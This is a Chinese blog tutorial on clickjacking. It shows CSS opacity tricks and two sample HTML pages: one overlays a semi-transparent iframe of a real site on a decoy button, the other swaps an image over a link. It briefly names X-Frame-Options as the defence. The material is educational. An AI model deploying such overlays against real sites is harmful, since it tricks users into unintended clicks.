web安全:ClickJacking点击劫持基础

最新推荐文章于 2024-04-28 21:30:00 发布
最新推荐文章于 2024-04-28 21:30:00 发布
阅读量150 收藏
点赞数
分类专栏: 安全技术 各种好玩的信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17046291/article/details/99606269
版权

第四天
点击劫持:通过组件透明度,欺骗用户点击隐藏在按钮下面的恶意地址
本质是一种视觉欺骗

一、基础知识

1.基础知识–不透明度设置

div
{
/* Hide from view */
-moz-opacity: 0;
opacity: 0;
filter: alpha(opacity=0);
}

-moz-opacity: 0;提供给mozilla firefox的css属性,用来控制透明度 , 值为0.1 10%
opacity: 0;设置 div 元素的不透明级别:从0.0(完全透明)~1.0(完全不透明)。
filter: alpha(opacity=0);/* IE8 以及更早的浏览器 */

2.基础知识–iframe不现实滚动条

scrolling=“no”;

二、攻击方式

1.通过隐藏组件,引诱用户点击,示例代码
<!DOCTYPE html>
<html>
 <head>
  <title>CLICK JACK!!!</title>
  <style>
  iframe {
   width: 700px;
   height: 150px;
   
   /* Use absolute positioning to line up update button with fake button */
   position: absolute;
   top: -60px;
   left: -600px;
   z-index: 2;
   
   /* Hide from view */
   -moz-opacity: 0.5;
   opacity: 0.5;
   filter: alpha(opacity=0.5);
  }
  button {
   position: absolute;
   top: 10px;
   left: 10px;
   z-index: 1;
   width: 120px;
  }
  </style>
 </head>
  <body>
    <iframe src="https://www.qidian.com" scrolling="no"></iframe>
    <button>CLICK HERE!</button>
  </body>
</html>
2.flash小游戏,同理隐藏底层按钮,上层引诱用户进行点击
3.替换图片链接地址,引诱用户点击图片
<!DOCTYPE html>
<html>
<head>
<style>
  img {
   position: absolute;
   top: 0px;
   left: 0px;
  }
  </style>
</head>
<body>

<div>利用的是替换图片CSS样式,达到欺骗。</div>
<a href="https://www.baidu.com">
<img src=https://i1.sinaimg.cn/dy/deco/2013/0329/logo/LOGO_1x.png> 
</a>

</body>
</html>

三、如何防御

针对传统的ClickJacking一般是通过禁止跨域iframe;
浏览器已经支持X-Frame-Options;

硬核Top
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
点击劫持页面.rar
05-28
点击劫持Clickjacking)是一种恶意攻击手段,它利用透明或半透明的iframe层来欺骗用户点击原本不想点击的元素,从而达到攻击者的目的。这个"点击劫持页面.rar"文件提供了一个静态页面示例,用于演示这种攻击方式,...
WebSecurity:网络安全文档
05-29
3. **点击劫持(Clickjacking)**:攻击者通过透明层诱导用户在不知情的情况下点击,执行恶意操作。防止点击劫持的方法有设置`X-Frame-Options`响应头,禁止页面在iframe中加载。 4. **JavaScript注入**:攻击者可能...
web安全————clickjacking点击劫持
longger_lee
12-14 7389
点击劫持clickjacking)       点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个网页上,通过调整iframe页面位置,诱使用户在页面上进行操作,在不知情的情况下用户的点击恰好是点击
Web安全点击劫持ClickJacking
When you collect everything, you understand nothing.
09-07 554
0x00 什么是点击劫持 点击劫持ClickJacking)是一种视觉上的欺骗手段,主要有两种方式。 一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面.通过调整iframe页面的位置,可以诱使用户恰好点击在被覆盖页面的一些功能性按钮上。 二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义。将被劫持...
网络安全-点击劫持ClickJacking)的原理、攻击及防御
关注网络安全、云原生安全
08-15 1万+
简介 2008年,安全专家Robert Hansen 与Jeremiah Grossman发现了一种被他们称为点击劫持(Cli)的攻击 原理 攻击 防御
web安全点击劫持(clickjacking)
infi
03-19 1万+
百度解释: 点击劫持clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。 它是通过覆盖不可见的框架误导受害者点击。 虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 这种攻击利用了HTML中标签的透明属性。 就像一张图片上
点击劫持ClickJacking
qq_56327824的博客
03-30 1万+
点击劫持ClickJacking) 什么是点击劫持 点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的,不可见的iframe,覆盖在一个网页上,然后诱导使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱导用户恰巧点击在iframe页面的一些功能性按键上 不懂iframe是干什么的同学,自己补充一下 利用iframe <!DOCTYPE html> <html lang="en"> <head>
Web安全ClickJacking 基本概念及相关实践
qq_37858047的博客
07-28 223
ClickJacking介绍 Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or disguised as another element. This can cause users to unwittingly download malware, ...
Web 安全点击劫持Clickjacking)攻击详解_点击劫持攻击
最新发布
2401_84578953的博客
04-28 1193
点击劫持Clickjacking)攻击,又称为界面伪装攻击,是一种利用视觉欺骗手段进行攻击的方式。攻击者通过技术手段欺骗用户点击本没有打算点击的位置,当用户在被攻击者攻击的页面上进行操作时,实际点击结果被劫持,从而被攻击者利用。这种攻击方式利用了用户对网站的信任,通过覆盖层(通常是透明的iframe)覆盖在另一个网页之上,使受害者无法察觉。
Web安全的三个攻防姿势
02-25
我们最常见的Web安全攻击有以下几种1.XSS跨站脚本攻击2.CSRF跨站请求伪造3.clickjacking点击劫持/UI-覆盖攻击下面我们来一一分析跨站脚本攻击(CrossSiteScripting),为了不和层叠样式表(CascadingStyleSheets,CSS...
clickjackingpoc:点击劫持攻击的概念证明
05-24
一种基于WebClickJacking PoC工具。 跑步 确保您已安装php(默认安装在Kali / Parrot OS上) 下载如果尚不存在,也可以使用XAMPP。 在下载的目录中,运行命令root @ rohit〜php -S localhost:8000以在端口8000...
web安全:XSS测试平台使用教程
热门推荐
平平无奇
08-12 2万+
我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 一、注册用户并登录 二、创建项目 1.创建项目,创建完后会生成一个xss可用脚本地址 项目名...
信息收集--子域名查询
平平无奇
08-12 7044
whois可以查询出 域名的基本信息,但是我们更需要查找域名下面还有哪些子域名,对子站进行渗透、挖掘! 子域名在线查找工具 一、https://crt.sh/ 二、https://hackertarget.com/find-dns-host-records/ 三、https://dnsdumpster.com/ ...
ubuntu 安装msfconsole
平平无奇
08-08 5233
#cd /opt #sudo wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb #sudo mv msfupdate.erb msfinstall #sudo chmod 755...
subfinder子域名发现工具
平平无奇
08-19 4404
subfinder,是用来查询域名的子域名信息的工具,可以使用很多国外安全网站的api接口进行自动化搜索子域名信息; 一、github项目地址 https://github.com/subfinder/subfinder#direct-installation 二、安装 1.需要安装go环境,一定要替换go代理地址 2.安装subfinder go get github.com/subfinder...
ROT13是什么!
平平无奇
05-14 4013
ROT13(回转13位,rotateby13places,有时中间加了个减号称作ROT-13)是一种简易的置换暗码。----《互动百科》简单的说就是通过将输入的原字符串ASCII+13/或者ASCC-13:原字符串:ABCDEFGHIJKLM   NOPQRSTUVWXYZ           abcdefghijklm   nopqrstuvwxyz65                78 ...
web安全:网站子目录爆破+beef工具介绍
平平无奇
08-18 2449
一. 网站子目录爆破工具 1.dirbuster,kali系统自带界面,使用起来非常简单 字典目录/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2.dirb https://www.baidu.com 二、beef工具 1.kali系统自带beef工具,启动之后就可以生成web端的使用界面,还有一个hook.js脚本页面,将...
通过命令行txt文本去重排序
平平无奇
08-08 1445
cat common-weakest.txt |sort | uniq > out.txt Txt文档去重
Web安全入门:SQL注入、XSS与CSRF防范详解
4. 点击劫持Clickjacking):攻击者通过掩盖真实页面,诱使用户无意中点击包含恶意脚本的隐藏窗口,实现对用户的操控。防止点击劫持的方法包括使用同源策略、HTTP头部设置和弹出窗口提示。 通过学习这些内容,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值